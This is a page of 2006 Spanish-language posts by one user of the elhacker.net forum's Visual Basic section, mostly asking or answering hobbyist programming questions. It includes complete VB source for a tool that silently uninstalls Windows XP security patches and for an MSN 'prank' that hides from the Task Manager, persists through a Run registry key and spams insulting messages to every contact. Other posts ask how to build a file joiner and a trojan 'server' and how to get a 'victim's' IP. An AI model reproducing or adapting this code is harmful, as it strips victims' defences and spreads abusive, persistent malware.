elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Temas
Páginas: 1 2 3 4 5 6 [7] 8 9
61  Programación / Programación Visual Basic / [Programa] Desinstalador de parches de seguridad en Windows XP en: 9 Marzo 2006, 16:56 pm
Weno, este programa lo que ahce es desinstalar los parches de seguridad de Windows. Les dejo el kode:

Código:
Const ERROR_NO_MORE_ITEMS = 259&
Const HKEY_CURRENT_CONFIG = &H80000005
Const HKEY_LOCAL_MACHINE = &H80000002
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegEnumKeyEx Lib "advapi32.dll" Alias "RegEnumKeyExA" (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpName As String, lpcbName As Long, ByVal lpReserved As Long, ByVal lpClass As String, lpcbClass As Long, lpftLastWriteTime As Any) As Long
Private Declare Function RegEnumValue Lib "advapi32.dll" Alias "RegEnumValueA" (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpValueName As String, lpcbValueName As Long, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

Private Sub Wait(ByVal nSec As Integer)

    t1 = Second(Now)
    t2 = t1 + nSec
    Do
        DoEvents
    Loop While t2 > Second(Now)
End Sub


Sub matar()
For i = 0 To List1.ListCount - 1
Shell ("C:\WINDOWS\$NtUninstall" & List1.List(i) & "$\spuninst\spuninst.exe"), vbHide
Wait (5)
SendKeys ("{ENTER}")
Wait (90)
Next
End Sub


Private Sub Form_Load()
    'KPD-Team 2001
    'URL: http://www.allapi.net/
    'E-Mail: KPDTeam@Allapi.net
    Dim hKey As Long, Cnt As Long, sName As String, sData As String, Ret As Long, RetData As Long
    Const BUFFER_SIZE As Long = 255
    'Set the forms graphics mode to persistent
    Ret = BUFFER_SIZE
    'Open the registry key
    If RegOpenKey(HKEY_LOCAL_MACHINE, "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP", hKey) = 0 Then
        'Create a buffer
        sName = Space(BUFFER_SIZE)
        'Enumerate the keys
        While RegEnumKeyEx(hKey, Cnt, sName, Ret, ByVal 0&, vbNullString, ByVal 0&, ByVal 0&) <> ERROR_NO_MORE_ITEMS
            'Show the enumerated key
           List2.AddItem Left$(sName, Ret)
            'prepare for the next key
            Cnt = Cnt + 1
            sName = Space(BUFFER_SIZE)
            Ret = BUFFER_SIZE
        Wend
        'close the registry key
        RegCloseKey hKey
    Else
        Me.Print "  Error while calling RegOpenKey"
    End If
   
    For i = 0 To List2.ListCount - 1
   
    If RegOpenKey(HKEY_LOCAL_MACHINE, "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows XP\SP2", hKey) = 0 Then
        'Create a buffer
        sName = Space(BUFFER_SIZE)
        'Enumerate the keys
        While RegEnumKeyEx(hKey, Cnt, sName, Ret, ByVal 0&, vbNullString, ByVal 0&, ByVal 0&) <> ERROR_NO_MORE_ITEMS
            'Show the enumerated key
           List1.AddItem Left$(sName, Ret)
            'prepare for the next key
            Cnt = Cnt + 1
            sName = Space(BUFFER_SIZE)
            Ret = BUFFER_SIZE
        Wend
        'close the registry key
        RegCloseKey hKey
    Else
        Me.Print "  Error while calling RegOpenKey"
    End If
    Wait (1)
    matar
    Wait (120)
    Next
    End
   
End Sub

Hay kode que no es mio, me lo paso kizar en otro post.

Weno, nota para los mas expertos, Si ven algun fallo diganlo porfa.... ;) ;) ;)

Salu2

Hendrix

62  Programación / Programación Visual Basic / Meter llaves del registro dentro de un .txt en: 8 Marzo 2006, 23:37 pm
Weno, imaginemos que tenemos esta llave:

HKLM\Software\Microsoft\Windows

y keremos meter todas las llaves de esta ruta dentro de un .txt (los nombres de las llaves, lo que hay dentro no)....

Komo se aria??? es posible en VB???

Weno, espero que me puedan resolvere sta duda...

Salu2

Hendrix

63  Programación / Programación Visual Basic / Encontrar una palabra dentro de un texto en: 5 Marzo 2006, 17:14 pm
Weno, ya se que esto es facilito, pero no lo se hacer (se que es kon una instruccion, pero no se kual)...

Weno, supongamos que dentro de la variable texto esta este texto:

the Hendrix Power

Oka, supongamos que no konozko el "Space" de la variable texto, y yo quiero enkontrar dentro de este Texto la palabra Hendrix....

Komo se hace para que la variable resultado contenga la posicion de la palabra Hendrix???? y que luego la parabra Hendrix pueda cambiarse por otra palabra????

Weno, Muchas gracias....

Salu2

Hendrix

64  Programación / Programación Visual Basic / MouseClick en VB ?¿?¿?¿? en: 2 Marzo 2006, 18:41 pm
Weno, mi intencion es programar un programa que al iniciarse haga un Click de raton en el centro de la pantalla....

No pido el kode (puesto que lo quiero programar yo) solo pido ayuda, que apis uso????

Salu2 y gracias

Hendrix

65  Programación / Programación Visual Basic / [Broma para MSN]: MSN fucker By Hendrix en: 28 Febrero 2006, 20:45 pm
Weno, os dare el kode de un simple programa que e programado en 10 minutitos (lo que hace el aburrimiento..jajajaja  ;D ;D)

Las caracteristikas de este programa son:

- Se ejekuta cada Sesion
- 10 insultos (de Kizar y algunos mios)
- Cambia el Nik del MSN por un insulto
- Envia cada 20 segundos Un mensage a todos los usuarios agregados con un insulto
- No aparece en el Taskmanager
- La activacion es retardada (espera 1 minuto a activarse todo)

Weno, les dejo el kode:

Código:
Option Explicit
Public WithEvents MSN As MessengerAPI.Messenger
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer
Dim Men As String, Palabra As Long
Dim KeyResult As String
Dim contactos As MessengerAPI.IMessengerContact
Dim user As IMessengerContact
Dim I As Integer





Private Sub Form_Load()
On Error Resume Next
App.TaskVisible = False
Dim Hendrix
Set MSN = New MessengerAPI.Messenger
Set Hendrix = CreateObject("WScript.Shell")
Hendrix.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Win32", App.Path & "\" & App.EXEName & ".exe"
End Sub

Private Sub Timer1_Timer()
On Error Resume Next
Palabra = Int((Rnd * 10) + 1)
Select Case Palabra
Case 1
        Men = "k te jodan!!"
Case 2
        Men = "Idiota"
Case 3
        Men = "Hijo de p**a"
Case 4
        Men = "Me cago en tu p**a madre"
Case 5
        Men = "Cabron"
Case 6
        Men = "Me la kieres chupar???"
Case 7
        Men = "Me cago en la p**a zorra de tu madre"
Case 8
        Men = "Me cago en tus muertos!!!!"
Case 9
        Men = "Hijo de la gran p**a!!!!"
Case 10
        Men = "La zorra mas grande del planeta??? TU p**a MADRE!!!!"
End Select

KeyResult = GetAsyncKeyState(13)
    If KeyResult = -32767 Then
         SendKeys Men & "{enter}"
    End If

MSN.OptionsPages 0, MOPT_GENERAL_PAGE
SendKeys (Text1.Text & "{ENTER}")



End Sub

Private Sub Timer2_Timer()
On Error Resume Next
For Each user In MSN.MyContacts

If contactos.Status = MISTATUS_ONLINE Then
List1.AddItem contactos.SigninName
End If

For I = 0 To List1.ListCount - 1
MSN.InstantMessage List1.List(I)
SendKeys (" Kieres follar konmigo?? Soy un kapullo!!!! [Infectado kon un programa de Hendrix] ")
SendKeys ("{ENTER}")
Next
Next

End Sub

Private Sub Timer3_Timer()
On Error Resume Next
Timer1.Enabled = True
Timer2.Enabled = True
End Sub

Tienen que agregar esto:

1 Textbox
1 Listbox
3 Timers

Y ya sta, si ven algun error posteadlo...

Salu2

Hendrix

66  Programación / Programación Visual Basic / Crear un Joiner en VB en: 24 Febrero 2006, 11:04 am
Weno, mi intencion es esa... yo ya tengo algo avanzado, pero no se kontinuar....lo que tengo es esto:

4 textbox, dos para la ruta de los archivos y dos para poner su tamaño....

luego creo un exe "virgen" que lo que hace es albergar los dos archivos y luego ejekutarlos....lo que no se hacer es que el archivo virgen los konsiga separar y luego crear y ejekutar... me expliko:

[VIRGEN]
[programa1]        ----->  [Virgen] , [Programa1] , [Programa2]
[Programa2]

Esto es lo que no se hacer....

Weno, gracias de todas formas...

Salu2

Hendrix

67  Programación / Programación Visual Basic / Problemas al leer en: 23 Febrero 2006, 16:06 pm
Weno, estoy haciendo un programa en VB que kontiene unos 12 Checkbox y luego un boton llamado crear que lo que hace es editar un server.

Lo que quiero hacer es que por ejemplo, si el user elige estos checkbox: 1, 5, 9, 6. el programa al crearlo lo ponga en una variable kon estos digitos= 1596.

Asta aki todo bien, el problema viene kuando el server tiene que saber que numeros lo an introducido, lo que se hacer es sacar el primer numero, pero lo siguiente no lo se hacer....

Si alguien me ayuda le estaria agradecido...  ;) ;) ;)

Salu2 a todos

Hendrix

68  Programación / Programación Visual Basic / Cargar archivo sin conocer el tamaño en: 13 Febrero 2006, 16:26 pm
Weno, en mi programa quiero juntar dos archivos (el que creo, y otro a elegir), pero el problema es que del archivo que quiero saber no se el tamaño, komo puedo hacer para abrir este archivo??? les pongo un ejemplo:

Dim tamaño As String
tamaño = Space(????)
Open "C:\archivo.exe" For binary As #1
Get #1, , tamaño
Close #1

Si conociera el tamaño me meteria todo el archivo en la variable tamaño, pero komo se puede hacer para calcular este tamaño???

Espero me hayan etendio...

Salu2

Hendrix


69  Programación / Programación Visual Basic / Duda pekeñiiiiiisima en: 12 Febrero 2006, 23:00 pm
Weno, pos eso, es una duda muy basica, pero fundamental para proseguir mi programa, weno, hay va:

Por ejemplo, yo ago que el programa se lea a si mismo y en una variable de 16 casillas enkonntrebos esto:

Hendrix The Best

Mi duda es komo se hace para que en la variable solo se almacene esto: Hendrix The??? Se necesita crear otra variable para hacer esto???

Plis, nesecito ayuda porfa...

Salu2 y gracias

Hendrix

70  Programación / Programación Visual Basic / IP por netstat en VB en: 8 Febrero 2006, 21:54 pm
Weno, estoy pensandome hacer un proyecto que haga lo siguiente:

Kuando se esta transferiendo un programa kon el MSN, que el programa mio se konekte por el puerto de la "viktima" que esta recibiendo mi "pakete" por el msn, y una vez "dentro" (en verdad no estara dentro) que sake la IP de la viktima, esto es posible??? entrar por un puerto habierto y ejekutar kodigo (en konkreto el ipconfig) en la makina remota????

Weno, Salu2 a todos

Hendrix

Páginas: 1 2 3 4 5 6 [7] 8 9
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines